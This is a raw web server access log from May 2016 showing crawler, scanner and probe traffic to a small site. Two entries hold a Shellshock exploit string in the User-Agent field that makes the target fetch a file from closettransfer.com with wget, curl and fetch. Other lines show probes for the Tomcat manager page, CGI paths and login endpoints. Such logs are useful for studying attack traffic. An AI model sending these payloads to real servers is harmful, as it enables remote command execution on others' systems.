5.39.222.159 - - [13/May/2016:06:03:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; A1-810 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
5.39.222.159 - - [13/May/2016:06:37:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; A1-810 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
123.59.59.52 - - [13/May/2016:07:26:18 +0200] "GET http://www.qunar.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
189.218.24.62 - - [13/May/2016:08:05:22 +0200] "GET /cgi/common.cgi HTTP/1.0" 404 319 "-" "Wget(linux)"
187.160.206.210 - - [13/May/2016:08:05:22 +0200] "GET /cgi/common.cgi HTTP/1.0" 404 319 "-" "Wget(linux)"
201.166.214.182 - - [13/May/2016:08:05:22 +0200] "GET /cgi/common.cgi HTTP/1.0" 404 319 "-" "Wget(linux)"
177.226.69.186 - - [13/May/2016:08:05:22 +0200] "GET /cgi/common.cgi HTTP/1.0" 404 319 "-" "Wget(linux)"
201.166.214.182 - - [13/May/2016:08:05:22 +0200] "GET /cgi/common.cgi HTTP/1.0" 404 319 "-" "Wget(linux)"
177.226.69.186 - - [13/May/2016:08:05:22 +0200] "GET /cgi/common.cgi HTTP/1.0" 404 319 "-" "Wget(linux)"
201.166.214.182 - - [13/May/2016:08:05:22 +0200] "GET /cgi/common.cgi HTTP/1.0" 404 319 "-" "Wget(linux)"
189.218.24.62 - - [13/May/2016:08:05:22 +0200] "GET /stssys.htm HTTP/1.0" 404 315 "-" "Wget(linux)"
201.172.187.238 - - [13/May/2016:08:05:22 +0200] "GET /cgi/common.cgi HTTP/1.0" 404 319 "-" "Wget(linux)"
187.160.206.210 - - [13/May/2016:08:05:22 +0200] "GET /stssys.htm HTTP/1.0" 404 315 "-" "Wget(linux)"
201.172.187.238 - - [13/May/2016:08:05:22 +0200] "GET /cgi/common.cgi HTTP/1.0" 404 319 "-" "Wget(linux)"
201.166.214.182 - - [13/May/2016:08:05:22 +0200] "GET /stssys.htm HTTP/1.0" 404 315 "-" "Wget(linux)"
201.166.214.182 - - [13/May/2016:08:05:22 +0200] "GET /stssys.htm HTTP/1.0" 404 315 "-" "Wget(linux)"
201.166.214.182 - - [13/May/2016:08:05:22 +0200] "GET /stssys.htm HTTP/1.0" 404 315 "-" "Wget(linux)"
201.172.187.238 - - [13/May/2016:08:05:22 +0200] "GET /cgi/common.cgi HTTP/1.0" 404 319 "-" "Wget(linux)"
177.226.69.186 - - [13/May/2016:08:05:22 +0200] "GET /stssys.htm HTTP/1.0" 404 315 "-" "Wget(linux)"
189.218.24.62 - - [13/May/2016:08:05:22 +0200] "GET / HTTP/1.0" 200 1229 "-" "Wget(linux)"
201.172.187.238 - - [13/May/2016:08:05:23 +0200] "GET /stssys.htm HTTP/1.0" 404 315 "-" "Wget(linux)"
187.160.206.210 - - [13/May/2016:08:05:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "Wget(linux)"
177.226.69.186 - - [13/May/2016:08:05:23 +0200] "GET /stssys.htm HTTP/1.0" 404 315 "-" "Wget(linux)"
201.172.187.238 - - [13/May/2016:08:05:23 +0200] "GET /stssys.htm HTTP/1.0" 404 315 "-" "Wget(linux)"
201.166.214.182 - - [13/May/2016:08:05:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "Wget(linux)"
201.166.214.182 - - [13/May/2016:08:05:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "Wget(linux)"
201.166.214.182 - - [13/May/2016:08:05:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "Wget(linux)"
201.172.187.238 - - [13/May/2016:08:05:23 +0200] "GET /stssys.htm HTTP/1.0" 404 315 "-" "Wget(linux)"
201.172.187.238 - - [13/May/2016:08:05:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "Wget(linux)"
177.226.69.186 - - [13/May/2016:08:05:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "Wget(linux)"
201.172.187.238 - - [13/May/2016:08:05:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "Wget(linux)"
177.226.69.186 - - [13/May/2016:08:05:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "Wget(linux)"
201.172.187.238 - - [13/May/2016:08:05:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "Wget(linux)"
212.83.177.193 - - [13/May/2016:08:14:53 +0200] "GET /robots.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
212.83.177.193 - - [13/May/2016:08:14:55 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
149.202.54.34 - - [13/May/2016:09:11:45 +0200] "GET /robots.txt HTTP/1.0" 404 334 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
149.202.54.34 - - [13/May/2016:09:11:46 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
162.243.228.61 - - [13/May/2016:10:41:31 +0200] "GET /robots.txt HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )"
162.243.228.61 - - [13/May/2016:10:41:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )"
66.240.219.146 - - [13/May/2016:10:55:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
66.240.219.146 - - [13/May/2016:10:55:37 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
66.240.219.146 - - [13/May/2016:10:55:37 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
5.39.222.159 - - [13/May/2016:10:58:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; A1-810 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
118.193.27.2 - - [13/May/2016:11:13:13 +0200] "\x16\x03\x01\x01\"\x01" 501 326 "-" "-"
118.193.27.2 - - [13/May/2016:11:13:20 +0200] "USER test +iw test :Test Wuz Here" 400 329 "-" "-"
118.193.27.2 - - [13/May/2016:11:13:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
118.193.27.2 - - [13/May/2016:11:13:34 +0200] "\x16\x03\x01\x01\"\x01" 501 326 "-" "-"
118.193.27.2 - - [13/May/2016:11:13:41 +0200] "USER test +iw test :Test Wuz Here" 400 329 "-" "-"
118.193.27.2 - - [13/May/2016:11:13:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
5.39.222.159 - - [13/May/2016:11:25:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; A1-810 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
169.229.3.91 - - [13/May/2016:11:28:47 +0200] "\xe3\x8fb\xc0" 501 319 "-" "-"
136.243.5.87 - - [13/May/2016:11:38:26 +0200] "GET /robots.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
136.243.5.87 - - [13/May/2016:11:38:28 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
89.163.148.58 - - [13/May/2016:11:54:56 +0200] "GET /robots.txt HTTP/1.0" 404 334 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
89.163.148.58 - - [13/May/2016:11:54:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
80.86.94.7 - - [13/May/2016:12:22:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)"
46.4.120.3 - - [13/May/2016:12:26:39 +0200] "GET /robots.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
46.4.120.3 - - [13/May/2016:12:26:41 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
221.231.6.195 - - [13/May/2016:12:34:03 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
5.39.222.159 - - [13/May/2016:13:06:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; A1-810 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
5.39.222.159 - - [13/May/2016:13:07:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; A1-810 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
157.55.39.124 - - [13/May/2016:13:09:44 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.124 - - [13/May/2016:13:09:47 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.240.219.146 - - [13/May/2016:13:10:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
66.240.219.146 - - [13/May/2016:13:10:12 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
66.240.219.146 - - [13/May/2016:13:10:12 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
72.76.243.86 - - [13/May/2016:17:23:08 +0200] "GET /robots.txt HTTP/1.1" 404 323 "-" "panscient.com"
72.76.243.86 - - [13/May/2016:17:23:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "panscient.com"
72.76.243.86 - - [13/May/2016:17:23:10 +0200] "GET /impressum.html HTTP/1.1" 404 327 "-" "panscient.com"
72.76.243.86 - - [13/May/2016:17:23:11 +0200] "GET /anfahrt.html HTTP/1.1" 404 325 "-" "panscient.com"
72.76.243.86 - - [13/May/2016:17:23:12 +0200] "GET /datenschutz.html HTTP/1.1" 404 329 "-" "panscient.com"
5.39.222.159 - - [13/May/2016:17:24:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; A1-810 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
62.210.143.245 - - [13/May/2016:17:47:16 +0200] "GET /robots.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
62.210.143.245 - - [13/May/2016:17:47:18 +0200] "GET /index.html HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
5.39.222.159 - - [13/May/2016:18:36:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; A1-810 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
107.150.32.60 - - [13/May/2016:19:25:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
220.167.100.13 - - [13/May/2016:19:40:10 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
220.167.100.13 - - [13/May/2016:19:40:11 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
220.167.100.13 - - [13/May/2016:19:40:11 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
220.167.100.13 - - [13/May/2016:19:40:11 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
220.167.100.13 - - [13/May/2016:19:40:11 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
220.167.100.13 - - [13/May/2016:19:40:14 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
106.184.3.122 - - [13/May/2016:20:03:22 +0200] "" 501 315 "-" "-"
74.91.17.180 - - [13/May/2016:20:11:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.17.181 - - [13/May/2016:20:39:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.17.182 - - [13/May/2016:21:55:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.20.197 - - [13/May/2016:22:13:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.18.42 - - [13/May/2016:22:38:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.17.181 - - [13/May/2016:22:39:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.20.194 - - [13/May/2016:22:42:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.20.196 - - [13/May/2016:23:09:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
123.59.59.52 - - [13/May/2016:23:28:54 +0200] "GET http://www.qyer.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
113.13.140.71 - - [13/May/2016:23:33:19 +0200] "POST /login.action HTTP/1.1" 404 317 "-" "Mozilla/5.0"
113.13.140.71 - - [13/May/2016:23:33:19 +0200] "POST /login.action HTTP/1.1" 404 317 "-" "Mozilla/5.0"
113.13.140.71 - - [13/May/2016:23:33:19 +0200] "POST /login.action HTTP/1.1" 404 317 "-" "Mozilla/5.0"
113.13.140.71 - - [13/May/2016:23:33:19 +0200] "POST /login.action HTTP/1.1" 404 317 "-" "Mozilla/5.0"
69.30.198.147 - - [13/May/2016:23:56:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.18.45 - - [14/May/2016:00:23:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
141.212.122.161 - - [14/May/2016:00:55:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
46.229.170.197 - - [14/May/2016:00:56:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:2.0) Gecko/20110307 Firefox/4.0"
107.150.32.58 - - [14/May/2016:00:58:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
222.186.58.140 - - [14/May/2016:01:55:18 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)"
222.186.58.140 - - [14/May/2016:01:55:20 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)"
222.186.58.140 - - [14/May/2016:01:55:20 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)"
222.186.58.140 - - [14/May/2016:01:55:26 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)"
107.150.46.36 - - [14/May/2016:02:02:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
107.150.32.62 - - [14/May/2016:02:11:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.18.44 - - [14/May/2016:02:36:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
221.231.6.195 - - [14/May/2016:02:37:04 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
221.231.6.195 - - [14/May/2016:02:37:20 +0200] "GET /templets/default/style/dedecms.css HTTP/1.1" 404 339 "http://212.91.246.88:80" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.91.20.197 - - [14/May/2016:02:56:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
221.231.6.195 - - [14/May/2016:03:00:53 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
221.231.6.195 - - [14/May/2016:03:01:14 +0200] "GET /templets/default/style/dedecms.css HTTP/1.1" 404 339 "http://212.91.246.81:80" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.59.59.52 - - [14/May/2016:03:07:54 +0200] "GET http://www.ctrip.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
74.91.20.197 - - [14/May/2016:03:10:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.20.196 - - [14/May/2016:03:22:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.17.180 - - [14/May/2016:04:03:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.17.182 - - [14/May/2016:04:10:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
103.211.192.4 - - [14/May/2016:04:58:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "() { :; }; /bin/sh -c 'wget http://closettransfer.com/xmlrpc_80.php -O /dev/null;wget1 http://closettransfer.com/xmlrpc_80.php -O /dev/null;curl http://closettransfer.com/xmlrpc_80.php -o /dev/null;/usr/sfwbin/wget http://closettransfer.com/xmlrpc_80.php;fetch -/dev/null http://closettransfer.com/xmlrpc_80.php'"
141.212.122.161 - - [14/May/2016:05:13:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
69.30.202.226 - - [14/May/2016:06:45:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
69.30.202.227 - - [14/May/2016:06:55:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
106.184.3.122 - - [14/May/2016:07:13:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
106.184.3.122 - - [14/May/2016:07:13:55 +0200] "" 501 315 "-" "-"
141.212.122.161 - - [14/May/2016:07:26:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
141.212.122.161 - - [14/May/2016:07:45:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
221.231.6.195 - - [14/May/2016:07:50:57 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
221.231.6.195 - - [14/May/2016:07:51:04 +0200] "GET /templets/default/style/dedecms.css HTTP/1.1" 404 339 "http://212.91.246.80:80" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
118.193.27.2 - - [14/May/2016:08:03:38 +0200] "\x16\x03\x01\x01\"\x01" 501 326 "-" "-"
118.193.27.2 - - [14/May/2016:08:03:45 +0200] "USER test +iw test :Test Wuz Here" 400 329 "-" "-"
118.193.27.2 - - [14/May/2016:08:03:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
221.231.6.195 - - [14/May/2016:08:13:23 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
221.231.6.195 - - [14/May/2016:08:13:30 +0200] "GET /templets/default/style/dedecms.css HTTP/1.1" 404 339 "http://212.91.246.87:80" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.30.226.100 - - [14/May/2016:08:34:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
95.131.69.245 - - [14/May/2016:08:51:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "() { :; }; /bin/sh -c 'wget http://closettransfer.com/xmlrpc_80.php -O /dev/null;wget1 http://closettransfer.com/xmlrpc_80.php -O /dev/null;curl http://closettransfer.com/xmlrpc_80.php -o /dev/null;/usr/sfwbin/wget http://closettransfer.com/xmlrpc_80.php;fetch -/dev/null http://closettransfer.com/xmlrpc_80.php'"
85.25.43.94 - - [14/May/2016:09:05:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36"
85.25.43.94 - - [14/May/2016:09:05:26 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
85.25.43.94 - - [14/May/2016:09:05:26 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
208.100.26.231 - - [14/May/2016:09:09:34 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
208.100.26.230 - - [14/May/2016:09:09:35 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
208.100.26.230 - - [14/May/2016:09:09:40 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
208.100.26.232 - - [14/May/2016:09:09:58 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
208.100.26.231 - - [14/May/2016:09:10:09 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
208.100.26.231 - - [14/May/2016:09:10:55 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
208.100.26.232 - - [14/May/2016:09:12:07 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
208.100.26.231 - - [14/May/2016:09:12:12 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
141.212.122.161 - - [14/May/2016:09:14:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
208.100.26.232 - - [14/May/2016:09:14:31 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
208.100.26.231 - - [14/May/2016:09:15:03 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
208.100.26.232 - - [14/May/2016:09:16:09 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
208.100.26.231 - - [14/May/2016:09:16:41 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
69.30.226.102 - - [14/May/2016:09:31:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
94.102.52.47 - - [14/May/2016:09:55:55 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
94.102.52.47 - - [14/May/2016:09:55:55 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
69.30.202.226 - - [14/May/2016:09:56:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
94.102.52.47 - - [14/May/2016:09:56:48 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
169.229.3.91 - - [14/May/2016:10:09:23 +0200] "Z#\x05\xa3\xa5\xdc\xfa\\F" 501 324 "-" "-"
212.91.214.213 - - [14/May/2016:10:47:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3"
212.91.214.213 - - [14/May/2016:10:47:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3"
